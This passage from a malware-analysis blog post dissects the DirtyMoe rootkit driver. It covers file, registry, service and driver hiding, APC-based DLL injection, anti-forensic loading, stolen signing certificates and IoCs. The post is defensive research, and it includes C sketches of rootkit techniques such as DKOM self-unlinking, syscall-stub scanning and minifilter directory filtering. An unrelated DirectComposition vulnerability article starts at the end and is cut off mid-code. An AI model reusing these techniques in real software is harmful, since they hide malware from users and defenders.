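For illustration, a minifilter that post-processes directory enumerations is registered roughly as in the sketch below; FltPostOperation() is the callback name used in the article, while the remaining structure and the filtering placeholder are illustrative assumptions:

#include <fltKernel.h>

static PFLT_FILTER g_Filter;

static FLT_POSTOP_CALLBACK_STATUS FltPostOperation(
    PFLT_CALLBACK_DATA Data, PCFLT_RELATED_OBJECTS FltObjects,
    PVOID CompletionContext, FLT_POST_OPERATION_FLAGS Flags)
{
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(CompletionContext);
    UNREFERENCED_PARAMETER(Flags);

    /* Only directory enumerations are of interest; entries matching the
     * WinDeviceNumber list would be unlinked from the result buffer here. */
    if (Data->Iopb->MinorFunction == IRP_MN_QUERY_DIRECTORY) {
        /* ... iterate FILE_*_DIRECTORY_INFORMATION records and remove matches ... */
    }
    return FLT_POSTOP_FINISHED_PROCESSING;
}

static const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_DIRECTORY_CONTROL, 0, NULL, FltPostOperation },
    { IRP_MJ_OPERATION_END }
};

static const FLT_REGISTRATION FilterRegistration = {
    sizeof(FLT_REGISTRATION), FLT_REGISTRATION_VERSION, 0,
    NULL,          /* context registration */
    Callbacks,     /* operation callbacks  */
    NULL,          /* unload routine       */
};

NTSTATUS RegisterMinifilter(PDRIVER_OBJECT DriverObject)
{
    NTSTATUS status = FltRegisterFilter(DriverObject, &FilterRegistration, &g_Filter);
    if (NT_SUCCESS(status))
        status = FltStartFiltering(g_Filter);
    return status;
}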

The FltPostOperation() method can modify a result of the QueryDirectory operations (IRP). In fact, the malware driver can affect (hide, insert, modify) a directory enumeration. So, some applications in the user-mode may not see the actual image of the requested directory.

The driver affects the QueryDirectory results only if the requesting process is not present in the whitelists. There are two kinds of whitelists. The first ones (Process ID and File names) ensure that the QueryDirectory results are not modified if the process ID or the process image file name requesting the given I/O operation (QueryDirectory) is present in the whitelists. These represent malware processes that should have access to the file system without restriction. The further whitelist is called WinDeviceNumber, defining a set of suffixes. The FltPostOperation() iterates over each item of the QueryDirectory result. If an enumerated item name has a suffix defined in the whitelist, the driver removes the item from the QueryDirectory results. This ensures that the whitelisted files are not visible to non-malware processes [2]. So, the driver can easily hide an arbitrary directory/file from user-mode applications, including explorer.exe. The name of the WinDeviceNumber whitelist is probably derived from the malware file names, e.g., Ke145057.xsl, since the suffix is a number; see Appendix B.

2.5 Callback of NTFS Driver

When the driver is loaded, the Driver Entry routine modifies the system driver for the NTFS filesystem. The original callback method for the IRP_MJ_CREATE major function is replaced by the malicious callback MalNtfsCreatCallback(), as Figure 1 illustrates. The malicious callback determines which requests gain access and which do not.

Figure 1. Rewrite IRP_MJ_CREATE callback of the regular NTFS driver

The malicious callback is active only if the Minifilter Driver registration has been done and the original callback has been replaced. There are whitelists and one blacklist. The whitelists store information about allowed process image names, process IDs, and allowed files. If the process requesting the disk access is whitelisted, then the requested file must also be on the whitelist. It is double protection. The blacklist is focused on process image names. Therefore, the blacklisted processes are denied access to the file system. Figure 2 demonstrates the whitelisting of processes. If a process is on the whitelist, the driver calls the original callback; otherwise, the request ends with access denied.

Figure 2. Grant access to whitelisted processes

In general, if the malicious callback determines that the requesting process is authorized to access the file system, the driver calls the original IRP_MJ_CREATE major function. If not, the driver finishes the request as STATUS_ACCESS_DENIED.

2.6 Registry Hiding

The driver can hide a given registry key. Each manipulation of a registry key goes through the kernel method GetCellRoutine(), which the driver hooks. The configuration manager assigns a control block (CM_KEY_CONTROL_BLOCK) to each open registry key and keeps all control blocks in a hash table so that existing control blocks can be found quickly. The GetCellRoutine() method computes the memory address of a requested key. Therefore, if the malware driver takes control over GetCellRoutine(), it can filter which registry keys will be visible; more precisely, which keys will be searched in the hash table.

The malware driver finds the address of the original GetCellRoutine() and replaces it with its own malicious hook method, MalGetCellRoutine(). The driver uses a well-documented implementation [3, 4]. It just goes through kernel structures obtained via the ZwOpenKey() kernel call. Then, the driver looks for the CM_KEY_CONTROL_BLOCK and its associated HHIVE structure corresponding to the requested key. The HHIVE structure contains a pointer to the GetCellRoutine() method, which the driver replaces; see Figure 3.

Figure 3. Overwriting GetCellRoutine

This method’s pitfall is that the offsets of the looked-up structures, variables, and methods are specific to each Windows version or build. So, the driver must determine which Windows version it runs on.

The MalGetCellRoutine() hook method performs 3 basic operations as follows:

  1. The driver calls the original kernel GetCellRoutine() method.
  2. Checks whitelists for a requested registry key.
  3. Catches or releases the requested registry key according to the whitelist check.
Registry Key Hiding

The hiding technique uses a simple principle. The driver iterates across the whole HIVE of a requested key. If the driver finds a registry key that should be hidden, it returns the last registry key of the iterated HIVE. When the iteration reaches the end of the HIVE, the driver does not return the last key, since it was returned before, but returns NULL, which ends the HIVE search.

The consequence of this principle is that if the driver wants to hide more than one key, it returns the last key of the searched HIVE multiple times. So, the final results of the registry query can contain duplicate keys.

Whitelisting

The services.exe and System processes are whitelisted by default, with no restrictions. Whitelisted process image names are likewise exempt from any registry access restriction.

The decision-making mechanism is more complicated on Windows 10. The driver hides the requested key only for the regedit.exe application if the Windows 10 build is 14393 (July 2016) or 15063 (March 2017).

2.7 Thread Notification

The main purpose of the Thread Notification is to inject malicious code into newly created threads. The driver registers a thread notification routine via PsSetCreateThreadNotifyRoutine() during the Driver Entry initialization. The routine registers a callback which is subsequently notified when a new thread is created or deleted. The suspicious callback (PCREATE_THREAD_NOTIFY_ROUTINE) NotifyRoutine() takes three arguments: ProcessID, ThreadID, and the Create flag. The driver affects only threads whose Create flag is set to TRUE, i.e., only newly created threads.
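The registration itself is a single call; the sketch below shows the general shape under the article's naming (NotifyRoutine, WinDriverMaker* variables), with the actual matching and injection logic left as comments:

#include <ntifs.h>

static VOID NotifyRoutine(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create)
{
    UNREFERENCED_PARAMETER(ThreadId);

    if (!Create)
        return;    /* only newly created threads are of interest */

    /* Here the driver would compare the owning process (image name or
     * command-line checksum stored in the WinDriverMaker* variables) and,
     * on a match, stage the APC-based injection for ProcessId. */
    UNREFERENCED_PARAMETER(ProcessId);
}

NTSTATUS RegisterThreadNotification(VOID)
{
    return PsSetCreateThreadNotifyRoutine(NotifyRoutine);
}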

The whitelisting is focused on two aspects. The first one is the image name, and the second one is the command-line arguments of a created thread. The image name is stored in WinDriverMaker1, and the arguments are stored as a checksum in the WinDriverMaker2 variable. The driver is designed to inject only two processes defined by a process name and two processes defined by command-line arguments. There are no whitelists, just 4 global variables.

2.7.1 Kernel Method Lookup

The successful injection of the malicious code requires several kernel methods. To avoid detection, the driver does not call these methods directly but obfuscates the lookup of the required methods. The driver requires the following methods: ZwReadVirtualMemory, ZwWriteVirtualMemory, ZwQueryVirtualMemory, ZwProtectVirtualMemory, NtTestAlert, LdrLoadDll.

These methods are needed for successful thread injection because the driver needs to read/write process data of an injected thread, including program instructions.

Virtual Memory Method Lookup

The driver gets the address of the ZwAllocateVirtualMemory() method. As Figure 4 illustrates, all lookup methods are consecutively located after ZwAllocateVirtualMemory() method in ntdll.dll.

Figure 4. Code segment of ntdll.dll with VirtualMemory methods

The driver starts to inspect the code segment from the address of ZwAllocateVirtualMemory() and looks for instructions that move a constant into eax (e.g., mov eax, ??h). This identifies the VirtualMemory methods; see Table 7 for the constants.

Constant Method
0x18 ZwAllocateVirtualMemory
0x23 ZwQueryVirtualMemory
0x3A NtWriteVirtualMemory
0x50 ZwProtectVirtualMemory
Table 7. Constants of Virtual Memory methods for Windows 10 (64 bit)

When an appropriate constant is found, the final address of the looked-up method is calculated as follows:

method_address = constant_address - alignment_constant;
where alignment_constant helps to point to the start of the looked-up method.

The steps to find the methods can be summarized as follows (a minimal sketch follows the list):

  1. Get the address of ZwAllocateVirtualMemory(), which is not suspicious in terms of detection.
  2. Each sought method contains a specific constant on a specific address (constant_address).
  3. If the constant_address is found, another specific offset (alignment_constant) is subtracted;
    the alignment_constant is specific for each Windows version.
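A minimal sketch of such a scan is given below, assuming the x64 stub layout in which the syscall number is loaded with a mov eax, imm32 instruction (opcode 0xB8); the scan limit and the way the alignment constant is applied are illustrative:

#include <ntifs.h>

static PVOID FindSyscallStub(PUCHAR zwAllocateVirtualMemory, ULONG wantedConstant,
                             SIZE_T alignmentConstant, SIZE_T scanLimit)
{
    for (SIZE_T i = 0; i + 5 <= scanLimit; i++) {
        /* Look for "mov eax, imm32" carrying the target constant
         * (e.g. 0x50 for ZwProtectVirtualMemory per Table 7). */
        if (zwAllocateVirtualMemory[i] == 0xB8 &&
            *(ULONG UNALIGNED *)(zwAllocateVirtualMemory + i + 1) == wantedConstant) {
            /* Step back to the beginning of the stub using the
             * version-specific alignment constant. */
            return zwAllocateVirtualMemory + i - alignmentConstant;
        }
    }
    return NULL;
}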

The exact implementation of the Virtual Memory Method Lookup is shown in Figure 5.

Figure 5. Implementation of the lookup routine searching for the kernel VirtualMemory methods

The success of this obfuscation depends on the Windows version identification. We found one Windows 7 version for which the lookup returns different methods than the malware expects; namely, ZwCompressKey(), ZwCommitEnlistment(), ZwCreateNamedPipeFile(), and ZwAlpcDeleteSectionView().
The alignment_constant is derived from the current Windows version during the driver initialization; see the Driver Entry routine.

NtTestAlert and LdrLoadDll Lookup

A different approach is used for getting the NtTestAlert() and LdrLoadDll() routines. The driver attaches to the winlogon.exe process and gets a pointer to the PEB_LDR_DATA structure, which contains the PE headers and imports of the modules loaded in the process. If the import table includes a required method, the driver extracts its base address, which is the entry point of the sought routine.

2.7.2 Process Injection

The aim of the process injection is to load a defined DLL library into a new thread via the LdrLoadDll() function. The process injection is slightly different for the x86 and x64 OS versions.

The x64 OS version abuses the original NtTestAlert() routine, which checks the thread’s APC queue. An APC (Asynchronous Procedure Call) is a technique to queue a job to be done in the context of a specific thread, and it is called periodically. The driver rewrites the instructions of NtTestAlert() so that they jump to the entry point of the malicious code.

Modification of NtTestAlert Code

The first step of the process injection is to find free memory for a code cave. The driver finds free memory near the NtTestAlert() routine address. The code cave includes a shellcode, as Figure 6 demonstrates.

Figure 6. Malicious payload overwriting the original NtTestAlert() routine

The shellcode prepares a parameter (the code_cave address) for the malicious code and then jumps into it. The original NtTestAlert() address is moved into rax because the malicious code ends with a return instruction, and therefore the original NtTestAlert() is invoked. Finally, rdx contains the jump address where the driver injected the malicious code. The next item of the code cave is the path to the DLL file which shall be loaded into the injected process. The remaining items of the code cave are the original address and the original code instructions of NtTestAlert().

The driver writes the malicious code to the address defined in dll_loading_shellcode. The original instructions of NtTestAlert() are overwritten with an instruction that simply jumps to the shellcode. As a result, when NtTestAlert() is called, the shellcode is activated and jumps into the malicious code.

Malicious Code x64

The malicious code for x64 is simple. Firstly, it recovers the original instruction of the rewritten NtTestAlert() code. Secondly, the code invokes the found LdrLoadDll() method and loads appropriate DLL into the address space of the injected process. Finally, the code executes the return instruction and jumps back to the original NtTestAlert() function.

The x86 OS version abuses the entry point of the injected process directly. The procedure is very similar to the x64 injection, and the x86 malicious code is also identical to the x64 version. However, the x86 malicious code needs to find the 32-bit variant of the LdrLoadDll() method. It uses a technique similar to the one described above (NtTestAlert and LdrLoadDll Lookup).

2.8 Service Hiding

Windows uses the Service Control Manager (SCM) to manage the system services. The executable of SCM is services.exe. This program runs at system startup and performs several functions, such as running, ending, and interacting with system services. The SCM process also keeps all running services in an undocumented service record (SERVICE_RECORD) structure.

The driver must patch the service record to hide a required service. Firstly, the driver must find the services.exe process and attach to it via KeStackAttachProcess(). The malware author defined a byte sequence which the driver looks for in the process memory to find the service record. The services.exe process keeps all running services as a linked list of SERVICE_RECORDs [5]. The malware driver iterates this list and unlinks the required services defined by the listServices whitelist; see Table 4.

The byte sequence used for Windows 2000, XP, Vista, and Windows 7 is as follows: {45 3B E5 74 40 48 8D 0D}. There is another byte sequence {48 83 3D ?? ?? ?? ?? ?? 48 8D 0D} that is never used because it is bound to a Windows version that the malware driver never identifies; it is perhaps still in development.
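The attach-and-scan step could look roughly like the following sketch; the process pointer (obtained, for instance, via PsLookupProcessByProcessId), the scanned range, and the unlinking placeholder are assumptions, while the byte pattern is the one quoted above:

#include <ntifs.h>

static const UCHAR g_Pattern[] = { 0x45, 0x3B, 0xE5, 0x74, 0x40, 0x48, 0x8D, 0x0D };

VOID ScanServicesMemory(PEPROCESS ServicesProcess, PUCHAR start, SIZE_T length)
{
    KAPC_STATE apc;

    /* Switch the current thread into the address space of services.exe. */
    KeStackAttachProcess((PRKPROCESS)ServicesProcess, &apc);

    /* A real implementation would validate/probe the range before reading it. */
    for (SIZE_T i = 0; i + sizeof(g_Pattern) <= length; i++) {
        if (RtlCompareMemory(start + i, g_Pattern, sizeof(g_Pattern)) == sizeof(g_Pattern)) {
            /* The SERVICE_RECORD list would be located relative to this hit,
             * and the entries named in listServices unlinked here. */
            break;
        }
    }

    KeUnstackDetachProcess(&apc);
}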

The hidden services cannot be detected using the PowerShell command Get-Service, Windows Task Manager, Process Explorer, etc. However, started services are logged via the Windows Event Log. Therefore, we can enumerate all regular services and all logged services and then diff the two lists to find the hidden services.

2.9 Driver Hiding

The driver is able to hide itself or another malicious driver based on an IOCTL from user-mode. The Driver Entry receives a parameter representing the driver object (DRIVER_OBJECT) of the loaded driver image. The driver object contains an officially undocumented item called the driver section. The LDR_DATA_TABLE_ENTRY kernel structure stores information about the loaded driver, such as base/entry point address, image name, image size, etc. The driver section points to a LDR_DATA_TABLE_ENTRY that is part of a double-linked list representing all loaded drivers in the system.

When a user-mode application lists all loaded drivers, the kernel enumerates the double-linked list of LDR_DATA_TABLE_ENTRY structures. The malware driver iterates the whole list and unlinks the items (drivers) that should be hidden. Therefore, the kernel loses the pointers to the hidden drivers and cannot enumerate all loaded drivers [6].
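A minimal sketch of this DKOM unlinking is shown below for the self-hiding case; it treats the driver section as a structure whose first member is the InLoadOrderLinks list entry, which holds on common Windows builds but is an assumption here:

#include <ntifs.h>

/* Only the first member of the (undocumented) loader entry is needed here;
 * image base, entry point, BaseDllName, etc. follow in the real structure. */
typedef struct _KLDR_DATA_TABLE_ENTRY_MIN {
    LIST_ENTRY InLoadOrderLinks;
} KLDR_DATA_TABLE_ENTRY_MIN, *PKLDR_DATA_TABLE_ENTRY_MIN;

VOID HideSelf(PDRIVER_OBJECT DriverObject)
{
    PKLDR_DATA_TABLE_ENTRY_MIN self =
        (PKLDR_DATA_TABLE_ENTRY_MIN)DriverObject->DriverSection;

    /* Unlink this driver's entry from the loaded-module list so that
     * standard enumeration no longer reaches it. */
    RemoveEntryList(&self->InLoadOrderLinks);

    /* Point the orphaned entry at itself so later walks over it stay consistent. */
    InitializeListHead(&self->InLoadOrderLinks);
}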

2.10 Driver Unload

The Driver Unload function contains suspicious code, but it seems to be never used in this version. The rest of the unload functionality executes standard procedure to unload the driver from the system.

3. Loading Driver During Boot

The DirtyMoe service loads the malicious driver. The driver image is not permanently stored on disk; the service always extracts, loads, and then deletes the driver image on service startup. A secondary aim of the service is to eliminate evidence of the driver loading and thereby complicate forensic analysis. The service strives to camouflage registry and disk activity. The DirtyMoe service is registered as follows:

Service name: Ms<volume_id>App; e.g., MsE3947328App
Registry key: HKLM\SYSTEM\CurrentControlSet\services\<service_name>
ImagePath: %SystemRoot%\system32\svchost.exe -k netsvcs
ServiceDll: C:\Windows\System32\<service_name>.dll, ServiceMain
ServiceType: SERVICE_WIN32_SHARE_PROCESS
ServiceStart: SERVICE_AUTO_START

3.1 Registry Operation

On startup, the service creates a registry record, describing the malicious driver to load; see following example:

Registry key: HKLM\SYSTEM\CurrentControlSet\services\dump_E3947328
ImagePath: \??\C:\Windows\System32\drivers\dump_LSI_FC.sys
DisplayName: dump_E3947328

At first glance, it is evident that ImagePath does not reflect DisplayName, which is against the common Windows naming convention. Moreover, an ImagePath prefixed with the dump_ string is used by virtual drivers (loaded only in memory) managing the memory dump during a Windows crash. The malware mimics this virtual driver naming convention in order not to be conspicuous. The principle of the memory dump using the virtual drivers is described in [7, 8].

ImagePath values differ with each Windows reboot, but they always abuse the name of a native system driver; see a few instances collected during Windows boots: dump_ACPI.sys, dump_RASPPPOE.sys, dump_LSI_FC.sys, dump_USBPRINT.sys, dump_VOLMGR.sys, dump_INTELPPM.sys, dump_PARTMGR.sys

3.2 Driver Loading

When the registry entry is ready, the DirtyMoe service dumps the driver into the file defined by ImagePath. Then, the service loads the driver via ZwLoadDriver().
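From the service's side, the loading step boils down to a single native call. The sketch below is an illustrative user-mode equivalent (NtLoadDriver is the ntdll counterpart of the ZwLoadDriver call mentioned above); it assumes the service already holds SeLoadDriverPrivilege and reuses the example registry path from section 3.1:

#include <windows.h>
#include <winternl.h>
#include <wchar.h>

typedef NTSTATUS (NTAPI *PNTLOADDRIVER)(PUNICODE_STRING DriverServiceName);

int LoadDumpDriver(void)
{
    static WCHAR path[] =
        L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\dump_E3947328";
    UNICODE_STRING serviceName;

    PNTLOADDRIVER NtLoadDriverPtr =
        (PNTLOADDRIVER)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtLoadDriver");
    if (NtLoadDriverPtr == NULL)
        return -1;

    serviceName.Buffer = path;
    serviceName.Length = (USHORT)(wcslen(path) * sizeof(WCHAR));
    serviceName.MaximumLength = serviceName.Length + sizeof(WCHAR);

    /* Returns an NTSTATUS; requires SeLoadDriverPrivilege to succeed. */
    return (int)NtLoadDriverPtr(&serviceName);
}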

3.3 Evidence Cleanup

When the driver is loaded either successfully or unsuccessfully, the DirtyMoe service starts to mask various malicious components to protect the whole malware hierarchy.

The DirtyMoe service removes the registry key representing the loaded driver; see Registry Operation. Further, the loaded driver hides the malware services, as the Service Hiding section describes. The registry entries related to the driver are removed via the API call. Therefore, a forensic trace can be found in the SYSTEM registry HIVE, located in %SystemRoot%\system32\config\SYSTEM. The API call just removes the relevant HIVE pointer, but the unreferenced data is still present in the HIVE stored on the disk. Hence, we can read the removed registry entries via RegistryExplorer.

The loaded driver also removes the dumped (dump_ prefix) driver file. We were not able to restore this file via tools enabling recovery of deleted files, but it was extracted directly from the service DLL file.

Capturing the driver image and registry keys

The malware service is responsible for loading the driver and cleaning up the loading evidence. We put a breakpoint into the nt!IopLoadDriver() kernel method, which is reached when a process wants to load a driver into the system. We waited for the wanted driver, and then we listed all the system processes. The corresponding service (svchost.exe) had a call stack containing the kernel call for driver loading, and we killed the corresponding service by modifying the EIP register. The process (service) was killed, and the whole of Windows ended in a BSoD. Windows made a crash dump, so the file system caches were flushed, and the malicious service did not finish the cleanup in time. Therefore, we were able to mount the volume and read all the wanted data.

3.4 Forensic Traces

Although the DirtyMoe service takes great pains to cover up the malicious activities, there are a few aspects that help identify the malware.

The DirtyMoe service and loaded driver itself are hidden; however, the Windows Event Log system records information about started services. Therefore, we can get additional information such as ProcessID and ThreadID of all services, including the hidden services.

WinDbg connected to the Windows kernel can display all loaded modules using the lm command. The module list can uncover non-virtual drivers with prefix dump_ and identify the malicious drivers.

Offline connected volume can provide the DLL library of the services and other supporting files, which are unfortunately encrypted and obfuscated with VMProtect. Finally, the offline SYSTEM registry stores records of the DirtyMoe service.

4. Certificates

Windows Vista and later versions of Windows require that loaded drivers be code-signed. The digital code-signature should verify the identity and integrity of the driver vendor [9]. However, Windows does not check the current status of all certificates signing a Windows driver. So, if one of the certificates in the path is expired or revoked, the driver is still loaded into the system. We will not discuss why Windows loads drivers with invalid certificates, since this topic is quite broad. Backward compatibility, but also the potential impact on the kernel implementation, plays a role.

DirtyMoe drivers are signed with three certificates, as follows:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3C5883BD1DBCD582AD41C8778E4F56D9
Thumbprint: 02A8DC8B4AEAD80E77B333D61E35B40FBBB010A0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06B7AA2C37C0876CCB0378D895D71041
Thumbprint: 8564928AA4FBC4BBECF65B402503B2BE3DC60D4D
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5F78149EB4F75EB17404A8143AAEAED7
Thumbprint: 31E5380E1E0E1DD841F0C1741B38556B252E6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)

The certificates have been revoked by their certification authorities, and they are registered as stolen, leaked, misused, etc. [10]. Although all the certificates were revoked in the past, Windows loads these drivers successfully because the root certificate authorities are marked as trusted.

5. Summarization and Discussion

We summarize the main functionality of the DirtyMoe driver. We discuss the quality of the driver implementation, anti-forensic mechanisms, and stolen certificates for successful driver loading.

5.1 Main Functionality

Authorization

The driver is controlled via IOCTL codes which are sent by malware processes in user-mode. However, the driver implements an authorization mechanism, which verifies that the IOCTLs are sent by authenticated processes. Therefore, not all processes can communicate with the driver.

Affecting the Filesystem

If a rootkit is in the kernel, it can do “anything”. The DirtyMoe driver registers itself in the filter manager and begins to influence the results of filesystem I/O operations; in fact, it begins to filter the content of the filesystem. Furthermore, the driver replaces the NtfsCreatCallback() callback function of the NTFS driver, so the driver can determine which requests gain access to the filesystem and which do not.

Thread Monitoring and Code injection

The DirtyMoe driver registers a malicious routine which is invoked when the system creates a new thread. The malicious routine abuses the APC kernel mechanism to execute the malicious code. It loads an arbitrary DLL into the new thread.

Registry Hiding

This technique hooks the kernel method that indexes registry keys in a HIVE. The code execution of the hooked method is redirected to the malicious routine so that the driver can control the indexing of registry keys. In effect, the driver can select which keys will be indexed and which will not.

Service and Driver Hiding

Patching specific kernel structures causes certain API functions not to enumerate all system services or loaded drivers. Windows services and drivers are stored as double-linked lists in the kernel. The driver corrupts these kernel structures so that malicious services and drivers are unlinked from them. Consequently, if the kernel iterates these structures for the purpose of enumeration, the malicious items are skipped.

5.2 Anti-Forensic Technique

As we mentioned above, the driver is able to hide itself. But before the driver loading, the DirtyMoe service must register the driver in the registry and dump the driver into a file. When the driver is loaded, the DirtyMoe service deletes all registry entries related to the driver loading. The driver then deletes its own file from the file system through kernel-mode. Therefore, the driver is loaded in memory, but its file is gone.

The DirtyMoe service removes the registry entries via standard API calls. We can restore this data from the physical storage since the API calls only remove the pointer from the HIVE. The dumped driver file is never physically stored on the disk drive because its size is small and it is present only in the cache memory. Accordingly, the file is removed from the cache before the cache is flushed to disk, so we cannot restore the file from the physical disk.

5.3 Discussion

The whole driver serves as an all-in-one super-rootkit package. Any malware can register itself with the driver if it knows the authorization code. After successful registration, the malware can use a wide range of driver functionality. Since the authorization code is hardcoded and the driver’s name can be derived, we can hypothetically communicate with the driver and stop it.

The system loads the driver via the DirtyMoe service within a few seconds. Moreover, the driver file is never physically present in the file system, only in the cache. The driver is loaded via the API call, and the DirtyMoe service keeps a handle to the driver file, so manipulation of the driver file is limited. However, the driver removes its own file using a kernel call. Therefore, the driver file is removed from the file system cache, and the driver handle remains valid, with the difference that the driver file no longer exists, including its forensic traces.

The DirtyMoe malware is written in Delphi in most cases. Naturally, the driver is coded in native C. The code style of the driver and the rest of the malware is very different. Our analysis showed that most of the driver functionalities were taken from public samples on internet forums. Each implementation part of the driver is also written in a different style. The malware authors have merged individual rootkit functionality into one kit. They also merged known bugs, so the driver shows a few significant symptoms of driver presence in the system. The authors needed to adapt the functionality of the public samples to their purpose, but that has been done in a very dilettante way. It seems that the malware authors are familiar only with Delphi.

Finally, the code-signing certificates that are used were revoked in the middle of their validity period. However, the certificates are still widely used for code signing, so the private keys of the certificates have probably been stolen or leaked. In addition, the stolen certificates were issued by certification authorities which Microsoft trusts, so certificates signed in this way can be successfully loaded into the system despite their revocation. Moreover, the trend of misusing such certificates is growing, and predictions show that it will continue to grow in the future. We will analyze the problems of code-signing certificates in a future post.

6. Conclusion

The DirtyMoe driver is an advanced rootkit that DirtyMoe uses to effectively hide malicious activity on host systems. This research was undertaken to inspect the rootkit functionality of the DirtyMoe driver and evaluate its impact on infected systems. This study set out to investigate and present the analysis of the DirtyMoe driver, namely its functionality, its ability to conceal, its deployment, and its code-signature.

The research has shown that the driver provides key functionalities to hide malicious processes, services, and registry keys. Another dangerous capability of the driver is the injection of malicious code into newly created processes. Moreover, the driver also implements a minifilter, which monitors and affects I/O operations on the file system. Therefore, the content of the file system is filtered, and appropriate files/directories can be hidden from users. An implication of this finding is that the malware itself and its artifacts are hidden even from AVs. More importantly, the driver implements another anti-forensic technique which removes the driver’s evidence from disk and registry immediately after driver loading. However, a few traces can still be found on the victim’s machines.

This study has provided the first comprehensive review of the driver that protects and serves each malware service and process of the DirtyMoe malware. The scope of this study was limited in terms of driver functionality. However, further experimental investigation is needed to hunt out and analyze other samples that have been signed with the revoked certificates. In this way, the malware author might be traced and identified via the abused certificates.

IoCs

Samples (SHA-256)
550F8D092AFCD1D08AC63D9BEE9E7400E5C174B9C64D551A2AD19AD19C0126B1
AABA7DB353EB9400E3471EAAA1CF0105F6D1FAB0CE63F1A2665C8BA0E8963A05
B3B5FFF57040C801A4392DA2AF83F4BF6200C575AA4A64AB9A135B58AA516080
CB95EF8809A89056968B669E038BA84F708DF26ADD18CE4F5F31A5C9338188F9
EB29EDD6211836E6D1877A1658E648BEB749091CE7D459DBD82DC57C84BC52B1

References

[1] Kernel-Mode Driver Architecture
[2] Driver to Hide Processes and Files
[3] A piece of code to hide registry entries
[4] Hidden
[5] Opening Hacker’s Door
[6] Hiding loaded driver with DKOM
[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine

\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceAddress
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNumber
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceId
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceName
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceNameOnly
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverMaker2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDevicePathB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath1_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverPath2_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDeviceDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataA_2
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB
\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WinApi\\WinDriverDataB_2


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber
Data:
\WINDOWS\AppPatch\Ke601169.xsl;
\WINDOWS\AppPatch\Ke237043.xsl;
\WINDOWS\AppPatch\Ke311799.xsl;
\WINDOWS\AppPatch\Ke119163.xsl;
\WINDOWS\AppPatch\Ke531580.xsl;
\WINDOWS\AppPatch\Ke856583.xsl;
\WINDOWS\AppPatch\Ke999860.xsl;
\WINDOWS\AppPatch\Ke410472.xsl;
\WINDOWS\AppPatch\Ke673389.xsl;
\WINDOWS\AppPatch\Ke687417.xsl;
\WINDOWS\AppPatch\Ke689468.xsl;
\WINDOWS\AppPatch\Ac312B9050.sdb;
\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceName
Data:
C:\WINDOWS\AppPatch\Ac312B9050.sdb;
C:\WINDOWS\System32\Ms312B9050App.dll;

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Analysis of DirectComposition Binding and Tracker object vulnerability

DirectComposition introduction

Microsoft DirectComposition is a Windows component that enables high-performance bitmap composition with transforms, effects, and animations. Application developers can use the DirectComposition API to create visually engaging user interfaces that feature rich and fluid animated transitions from one visual to another.[1]

The DirectComposition API provides a COM interface via dcomp.dll, calls into win32kbase.sys through win32u.dll export functions, and finally sends data to the client program dwm.exe (Desktop Window Manager) through ALPC to complete the graphics rendering operation:

win32u.dll (Windows 10 1909) provides the following export functions to handle DirectComposition API:

The three functions related to triggering the vulnerability are NtDCompositionCreateChannel, NtDCompositionProcessChannelBatchBuffer and NtDCompositionCommitChannel:
(1) NtDCompositionCreateChannel creates a channel to communicate with the kernel:

typedef NTSTATUS(*pNtDCompositionCreateChannel)(
